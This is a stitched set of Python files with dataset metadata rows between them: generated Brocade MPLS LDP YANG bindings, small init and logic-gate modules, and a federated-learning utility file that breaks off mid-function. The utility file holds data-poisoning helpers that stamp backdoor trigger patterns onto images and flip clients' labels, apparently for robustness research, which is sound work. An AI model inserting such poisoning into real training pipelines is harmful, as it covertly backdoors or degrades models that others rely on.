self.__ldp_fec_summary = YANGDynClass(base=ldp_fec_summary.ldp_fec_summary, is_container='container', presence=False, yang_name="ldp-fec-summary", rest_name="ldp-fec-summary", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-summary', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__ldp_fec_prefixes = YANGDynClass(base=ldp_fec_prefixes.ldp_fec_prefixes, is_container='container', presence=False, yang_name="ldp-fec-prefixes", rest_name="ldp-fec-prefixes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefixes', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
self.__ldp_fec_vcs = YANGDynClass(base=ldp_fec_vcs.ldp_fec_vcs, is_container='container', presence=False, yang_name="ldp-fec-vcs", rest_name="ldp-fec-vcs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcs', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'mpls-state', u'ldp', u'fec']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'mpls-state', u'ldp', u'fec']
def _get_ldp_fec_summary(self):
"""
Getter method for ldp_fec_summary, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_summary (container)
"""
return self.__ldp_fec_summary
def _set_ldp_fec_summary(self, v, load=False):
"""
Setter method for ldp_fec_summary, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_summary (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_ldp_fec_summary is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ldp_fec_summary() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=ldp_fec_summary.ldp_fec_summary, is_container='container', presence=False, yang_name="ldp-fec-summary", rest_name="ldp-fec-summary", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-summary', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ldp_fec_summary must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=ldp_fec_summary.ldp_fec_summary, is_container='container', presence=False, yang_name="ldp-fec-summary", rest_name="ldp-fec-summary", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-summary', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__ldp_fec_summary = t
if hasattr(self, '_set'):
self._set()
def _unset_ldp_fec_summary(self):
self.__ldp_fec_summary = YANGDynClass(base=ldp_fec_summary.ldp_fec_summary, is_container='container', presence=False, yang_name="ldp-fec-summary", rest_name="ldp-fec-summary", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-summary', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_ldp_fec_prefixes(self):
"""
Getter method for ldp_fec_prefixes, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes (container)
"""
return self.__ldp_fec_prefixes
def _set_ldp_fec_prefixes(self, v, load=False):
"""
Setter method for ldp_fec_prefixes, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefixes (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_ldp_fec_prefixes is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ldp_fec_prefixes() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=ldp_fec_prefixes.ldp_fec_prefixes, is_container='container', presence=False, yang_name="ldp-fec-prefixes", rest_name="ldp-fec-prefixes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefixes', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ldp_fec_prefixes must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=ldp_fec_prefixes.ldp_fec_prefixes, is_container='container', presence=False, yang_name="ldp-fec-prefixes", rest_name="ldp-fec-prefixes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefixes', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__ldp_fec_prefixes = t
if hasattr(self, '_set'):
self._set()
def _unset_ldp_fec_prefixes(self):
self.__ldp_fec_prefixes = YANGDynClass(base=ldp_fec_prefixes.ldp_fec_prefixes, is_container='container', presence=False, yang_name="ldp-fec-prefixes", rest_name="ldp-fec-prefixes", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefixes', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_ldp_fec_vcs(self):
"""
Getter method for ldp_fec_vcs, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_vcs (container)
"""
return self.__ldp_fec_vcs
def _set_ldp_fec_vcs(self, v, load=False):
"""
Setter method for ldp_fec_vcs, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_vcs (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_ldp_fec_vcs is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ldp_fec_vcs() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=ldp_fec_vcs.ldp_fec_vcs, is_container='container', presence=False, yang_name="ldp-fec-vcs", rest_name="ldp-fec-vcs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcs', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ldp_fec_vcs must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=ldp_fec_vcs.ldp_fec_vcs, is_container='container', presence=False, yang_name="ldp-fec-vcs", rest_name="ldp-fec-vcs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcs', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__ldp_fec_vcs = t
if hasattr(self, '_set'):
self._set()
def _unset_ldp_fec_vcs(self):
self.__ldp_fec_vcs = YANGDynClass(base=ldp_fec_vcs.ldp_fec_vcs, is_container='container', presence=False, yang_name="ldp-fec-vcs", rest_name="ldp-fec-vcs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcs', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
def _get_ldp_fec_prefix_longer(self):
"""
Getter method for ldp_fec_prefix_longer, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefix_longer (list)
"""
return self.__ldp_fec_prefix_longer
def _set_ldp_fec_prefix_longer(self, v, load=False):
"""
Setter method for ldp_fec_prefix_longer, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefix_longer (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_ldp_fec_prefix_longer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ldp_fec_prefix_longer() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("prefix",ldp_fec_prefix_longer.ldp_fec_prefix_longer, yang_name="ldp-fec-prefix-longer", rest_name="ldp-fec-prefix-longer", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='prefix', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-longer', u'cli-suppress-show-path': None}}), is_container='list', yang_name="ldp-fec-prefix-longer", rest_name="ldp-fec-prefix-longer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-longer', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ldp_fec_prefix_longer must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("prefix",ldp_fec_prefix_longer.ldp_fec_prefix_longer, yang_name="ldp-fec-prefix-longer", rest_name="ldp-fec-prefix-longer", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='prefix', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-longer', u'cli-suppress-show-path': None}}), is_container='list', yang_name="ldp-fec-prefix-longer", rest_name="ldp-fec-prefix-longer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-longer', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)""",
})
self.__ldp_fec_prefix_longer = t
if hasattr(self, '_set'):
self._set()
def _unset_ldp_fec_prefix_longer(self):
self.__ldp_fec_prefix_longer = YANGDynClass(base=YANGListType("prefix",ldp_fec_prefix_longer.ldp_fec_prefix_longer, yang_name="ldp-fec-prefix-longer", rest_name="ldp-fec-prefix-longer", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='prefix', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-longer', u'cli-suppress-show-path': None}}), is_container='list', yang_name="ldp-fec-prefix-longer", rest_name="ldp-fec-prefix-longer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-longer', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
def _get_ldp_fec_vcid(self):
"""
Getter method for ldp_fec_vcid, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_vcid (list)
"""
return self.__ldp_fec_vcid
def _set_ldp_fec_vcid(self, v, load=False):
"""
Setter method for ldp_fec_vcid, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_vcid (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_ldp_fec_vcid is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ldp_fec_vcid() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("vc_id",ldp_fec_vcid.ldp_fec_vcid, yang_name="ldp-fec-vcid", rest_name="ldp-fec-vcid", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='vc-id', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcid', u'cli-suppress-show-path': None}}), is_container='list', yang_name="ldp-fec-vcid", rest_name="ldp-fec-vcid", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcid', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ldp_fec_vcid must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("vc_id",ldp_fec_vcid.ldp_fec_vcid, yang_name="ldp-fec-vcid", rest_name="ldp-fec-vcid", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='vc-id', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcid', u'cli-suppress-show-path': None}}), is_container='list', yang_name="ldp-fec-vcid", rest_name="ldp-fec-vcid", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcid', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)""",
})
self.__ldp_fec_vcid = t
if hasattr(self, '_set'):
self._set()
def _unset_ldp_fec_vcid(self):
self.__ldp_fec_vcid = YANGDynClass(base=YANGListType("vc_id",ldp_fec_vcid.ldp_fec_vcid, yang_name="ldp-fec-vcid", rest_name="ldp-fec-vcid", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='vc-id', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcid', u'cli-suppress-show-path': None}}), is_container='list', yang_name="ldp-fec-vcid", rest_name="ldp-fec-vcid", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcid', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
def _get_ldp_fec_prefix_prefix(self):
"""
Getter method for ldp_fec_prefix_prefix, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefix_prefix (container)
"""
return self.__ldp_fec_prefix_prefix
def _set_ldp_fec_prefix_prefix(self, v, load=False):
"""
Setter method for ldp_fec_prefix_prefix, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefix_prefix (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_ldp_fec_prefix_prefix is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ldp_fec_prefix_prefix() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=ldp_fec_prefix_prefix.ldp_fec_prefix_prefix, is_container='container', presence=False, yang_name="ldp-fec-prefix-prefix", rest_name="ldp-fec-prefix-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-prefix-ldp-fec-prefix-prefix-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ldp_fec_prefix_prefix must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=ldp_fec_prefix_prefix.ldp_fec_prefix_prefix, is_container='container', presence=False, yang_name="ldp-fec-prefix-prefix", rest_name="ldp-fec-prefix-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-prefix-ldp-fec-prefix-prefix-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__ldp_fec_prefix_prefix = t
if hasattr(self, '_set'):
self._set()
def _unset_ldp_fec_prefix_prefix(self):
self.__ldp_fec_prefix_prefix = YANGDynClass(base=ldp_fec_prefix_prefix.ldp_fec_prefix_prefix, is_container='container', presence=False, yang_name="ldp-fec-prefix-prefix", rest_name="ldp-fec-prefix-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-prefix-ldp-fec-prefix-prefix-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
ldp_fec_summary = __builtin__.property(_get_ldp_fec_summary)
ldp_fec_prefixes = __builtin__.property(_get_ldp_fec_prefixes)
ldp_fec_vcs = __builtin__.property(_get_ldp_fec_vcs)
ldp_fec_prefix_longer = __builtin__.property(_get_ldp_fec_prefix_longer)
ldp_fec_vcid = __builtin__.property(_get_ldp_fec_vcid)
ldp_fec_prefix_prefix = __builtin__.property(_get_ldp_fec_prefix_prefix)
_pyangbind_elements = {'ldp_fec_summary': ldp_fec_summary, 'ldp_fec_prefixes': ldp_fec_prefixes, 'ldp_fec_vcs': ldp_fec_vcs, 'ldp_fec_prefix_longer': ldp_fec_prefix_longer, 'ldp_fec_vcid': ldp_fec_vcid, 'ldp_fec_prefix_prefix': ldp_fec_prefix_prefix, }
| 80.434641 | 838 | 0.750376 | 3,602 | 24,613 | 4.847029 | 0.048862 | 0.096569 | 0.065983 | 0.053611 | 0.895355 | 0.863967 | 0.848502 | 0.841056 | 0.833209 | 0.82267 | 0 | 0.000457 | 0.111648 | 24,613 | 305 | 839 | 80.698361 | 0.798033 | 0.123471 | 0 | 0.453608 | 0 | 0.030928 | 0.403948 | 0.245217 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108247 | false | 0 | 0.072165 | 0 | 0.298969 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7c1c512188f642aff6c4c0164ec6a5c167c0b1eb | 83 | py | Python | torch_aesthetics/__init__.py | IsaacCorley/deep-aesthetics-pytorch | 90efdd7590f5583c02ab6564e3795a20ad10c9bc | [
"MIT"
] | 2 | 2021-03-27T03:20:07.000Z | 2021-03-31T10:13:38.000Z | torch_aesthetics/__init__.py | IsaacCorley/deep-aesthetics-pytorch | 90efdd7590f5583c02ab6564e3795a20ad10c9bc | [
"MIT"
] | null | null | null | torch_aesthetics/__init__.py | IsaacCorley/deep-aesthetics-pytorch | 90efdd7590f5583c02ab6564e3795a20ad10c9bc | [
"MIT"
] | null | null | null | from . import aadb
from . import metrics
from . import losses
from . import models
| 16.6 | 21 | 0.759036 | 12 | 83 | 5.25 | 0.5 | 0.634921 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.192771 | 83 | 4 | 22 | 20.75 | 0.940299 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7c300a692934e4b8d572f762e0d026499163900c | 99 | py | Python | src/osim/env/__init__.py | hashhar/major-project | bb2ba80d8a5a38f26f67a2661d21fc5a1d90ce69 | [
"MIT"
] | 4 | 2019-01-02T05:57:47.000Z | 2020-12-29T19:28:23.000Z | src/osim/env/__init__.py | hashhar/major-project | bb2ba80d8a5a38f26f67a2661d21fc5a1d90ce69 | [
"MIT"
] | null | null | null | src/osim/env/__init__.py | hashhar/major-project | bb2ba80d8a5a38f26f67a2661d21fc5a1d90ce69 | [
"MIT"
] | 1 | 2021-01-05T17:06:05.000Z | 2021-01-05T17:06:05.000Z | from __future__ import absolute_import
from .arm import *
from .human import *
from .osim import *
| 19.8 | 38 | 0.777778 | 14 | 99 | 5.142857 | 0.5 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161616 | 99 | 4 | 39 | 24.75 | 0.86747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7cc4496d0592ddd8b23b1964baa684006218ae35 | 498 | py | Python | logiccircuit/logic.py | TINYT1ME/LogicCircuit | 0a497d84a606c672a8bb3e7d55951835576a13e7 | [
"MIT"
] | 5 | 2021-11-16T04:12:35.000Z | 2022-01-02T22:57:42.000Z | logiccircuit/logic.py | TINYT1ME/LogicCircuit | 0a497d84a606c672a8bb3e7d55951835576a13e7 | [
"MIT"
] | null | null | null | logiccircuit/logic.py | TINYT1ME/LogicCircuit | 0a497d84a606c672a8bb3e7d55951835576a13e7 | [
"MIT"
] | null | null | null | # Logic for all gates
def not_gate_logic(inp):
return not inp[0].value
def and_gate_logic(inp):
return inp[0].value and inp[1].value
def nand_gate_logic(inp):
return not (inp[0].value and inp[1].value)
def or_gate_logic(inp):
return inp[0].value or inp[1].value
def nor_gate_logic(inp):
return not (inp[0].value or inp[1].value)
def xnor_gate_logic(inp):
return inp[0].value is inp[1].value
def xor_gate_logic(inp):
return inp[0].value is not inp[1].value
| 16.6 | 46 | 0.686747 | 95 | 498 | 3.452632 | 0.2 | 0.192073 | 0.256098 | 0.384146 | 0.792683 | 0.792683 | 0.792683 | 0.682927 | 0 | 0 | 0 | 0.031941 | 0.182731 | 498 | 29 | 47 | 17.172414 | 0.773956 | 0.038153 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 6 |
7cc9e829e138c85a1a90772179412ec72f5b0123 | 34,162 | py | Python | src/util.py | kppw99/UG_FedAVG | 61f6fcfedfed1136b19c12a6603231cda884e22f | [
"MIT"
] | 3 | 2021-09-23T02:10:17.000Z | 2022-01-16T03:38:34.000Z | src/util.py | kppw99/Uncert_FedAVG | 61f6fcfedfed1136b19c12a6603231cda884e22f | [
"MIT"
] | 1 | 2022-02-25T08:03:34.000Z | 2022-02-25T08:03:34.000Z | src/util.py | kppw99/Uncert_FedAVG | 61f6fcfedfed1136b19c12a6603231cda884e22f | [
"MIT"
] | 1 | 2022-02-23T11:49:25.000Z | 2022-02-23T11:49:25.000Z | import gzip
import random
import pickle
import argparse
import numpy as np
import pandas as pd
from pathlib import Path
from matplotlib import pyplot
from scipy.stats import entropy
import matplotlib.pyplot as plt
import torch
from torch.utils.data import TensorDataset
from torch.utils.data import DataLoader
from torch.utils.data import Dataset
import torchvision.transforms as transforms
import torchvision.datasets as datasets
use_cuda = torch.cuda.is_available()
class CustomTensorDataset(Dataset):
"""TensorDataset with support of transforms.
"""
def __init__(self, tensors, transform=None):
assert all(tensors[0].size(0) == tensor.size(0) for tensor in tensors)
self.tensors = tensors
self.transform = transform
def __getitem__(self, index):
x = self.tensors[0][index]
if self.transform:
x = self.transform(x)
y = self.tensors[1][index]
return x, y
def __len__(self):
return self.tensors[0].size(0)
def _split_and_shuffle_labels(y_data, seed):
num_of_class = len(set(y_data.tolist()))
y_data=pd.DataFrame(y_data, columns=['label'])
y_data['index'] = np.arange(len(y_data))
label_dict = dict()
cur_idx = list()
for i in range(num_of_class):
var_name = 'label' + str(i)
label_info = y_data[y_data['label'] == i]
np.random.seed(seed)
label_info = np.random.permutation(label_info)
label_info = pd.DataFrame(label_info, columns=['label', 'index'])
label_dict.update({var_name: label_info })
cur_idx.append(0)
return label_dict, cur_idx
def _get_iid_subsamples_indices(y_data, number_of_samples, seed):
num_of_class = len(set(y_data.tolist()))
label_dict, cur_idx = _split_and_shuffle_labels(y_data, seed)
sample_dict = dict()
dist = 1.0 / num_of_class
for i in range(number_of_samples):
sample_name = 'sample' + str(i)
dumb = pd.DataFrame()
for j in range(num_of_class):
label_name = str('label') + str(j)
if i == (number_of_samples - 1):
next_idx = len(label_dict[label_name])
else:
next_idx = int(len(label_dict[label_name]) * dist)
next_idx += cur_idx[j]
temp = label_dict[label_name][cur_idx[j]:next_idx]
dumb=pd.concat([dumb, temp], axis=0)
cur_idx[j] = next_idx
dumb.reset_index(drop=True, inplace=True)
sample_dict.update({sample_name: dumb})
return sample_dict
def _get_non_iid_subsamples_indices(y_data, number_of_samples, pdist, seed):
num_of_class = len(set(y_data.tolist()))
label_dict, cur_idx = _split_and_shuffle_labels(y_data, seed)
sample_dict = dict()
for i in range(number_of_samples):
sample_name = 'sample' + str(i)
dumb = pd.DataFrame()
dist1 = pdist * (2 / 3)
dist2 = pdist - dist1
dist3 = (1.0 - pdist) / (num_of_class - 2)
for j in range(num_of_class):
label_name = str('label') + str(j)
dist = dist1 if j == i else dist2 if (j % 5) == (i % 5) else dist3
if i == (number_of_samples - 1):
next_idx = len(label_dict[label_name])
else:
next_idx = int(len(label_dict[label_name]) * dist)
next_idx += cur_idx[j]
temp = label_dict[label_name][cur_idx[j]:next_idx]
dumb = pd.concat([dumb, temp], axis=0)
cur_idx[j] = next_idx
dumb.reset_index(drop=True, inplace=True)
sample_dict.update({sample_name: dumb})
return sample_dict
def _create_subsamples(sample_dict, x_data, y_data, x_name, y_name):
x_data_dict = dict()
y_data_dict = dict()
for i in range(len(sample_dict)): ### len(sample_dict)= number of samples
xname = x_name + str(i)
yname = y_name + str(i)
sample_name = "sample" + str(i)
indices = np.sort(np.array(sample_dict[sample_name]['index']))
x_info = x_data[indices, :]
if torch.cuda.is_available():
x_info = x_info.cuda()
x_data_dict.update({xname: x_info})
y_info = y_data[indices]
if torch.cuda.is_available():
y_info = y_info.cuda()
y_data_dict.update({yname: y_info})
return x_data_dict, y_data_dict
def _add_bd_pattern(x, start_idx=1, size=5, show=False):
temp_x = x.reshape(28, 28)
# trigger pattern (plus)
for i in range(start_idx, start_idx + size):
temp_x[i][(start_idx + size) // 2] = 1.0 # vertical line
temp_x[(start_idx + size) // 2][i] = 1.0 # horizontal line
if show is True:
plt.imshow(temp_x)
plt.show()
return temp_x.reshape(1, 28, 28)
def _add_bd_pattern_cifar10(x, start_idx=1, size=5, show=False):
temp_x = np.transpose(x, (1, 2, 0))
for i in range(2):
for j in range(start_idx, start_idx + size):
temp_x[j][(start_idx + size) // 2][i] = 1.0
temp_x[(start_idx + size) // 2][j][i] = 1.0
if show is True:
plt.imshow(temp_x)
plt.show()
return np.transpose(temp_x, (2, 0, 1))
def _add_bd_pattern_fmnist(x, start_idx=1, size=5, show=False):
# trigger pattern (plus)
for i in range(start_idx, start_idx + size):
x[i][((start_idx + size) // 2) - 1] = 255.0 # vertical line
x[i][((start_idx + size) // 2) + 1] = 255.0 # vertical line
x[((start_idx + size) // 2) - 1][i] = 255.0 # horizontal line
x[((start_idx + size) // 2) + 1][i] = 255.0 # horizontal line
if show is True:
plt.imshow(x)
plt.show()
return x
def _create_corrupted_subsamples(sample_dict, x_data, y_data, x_name, y_name,
cor_local_ratio=1.0, cor_label_ratio=0.2, cor_data_ratio=0.5, mode=1):
x_data_dict = dict()
y_data_dict = dict()
# make corrupted info
num_of_local = len(sample_dict)
num_of_label = len(set(y_data.tolist()))
cor_local_idx = random.sample(range(0, num_of_local), int(num_of_local * cor_local_ratio))
cor_label_idx = random.sample(range(0, num_of_label), int(num_of_label * cor_label_ratio))
temp = set(y_data.tolist())
temp.difference_update(cor_label_idx)
print('[*] Corrupted Label')
if mode == 1:
temp = list(temp)
cor_vals = random.sample(temp, int(num_of_label * cor_label_ratio))
print(cor_label_idx, '->', cor_vals)
else:
print(cor_label_idx, '-> random value')
print('')
for i in range(len(sample_dict)): ### len(sample_dict)= number of samples
xname = x_name + str(i)
yname = y_name + str(i)
sample_name = "sample" + str(i)
indices = np.sort(np.array(sample_dict[sample_name]['index']))
x_info = x_data[indices, :]
if torch.cuda.is_available():
x_info = x_info.cuda()
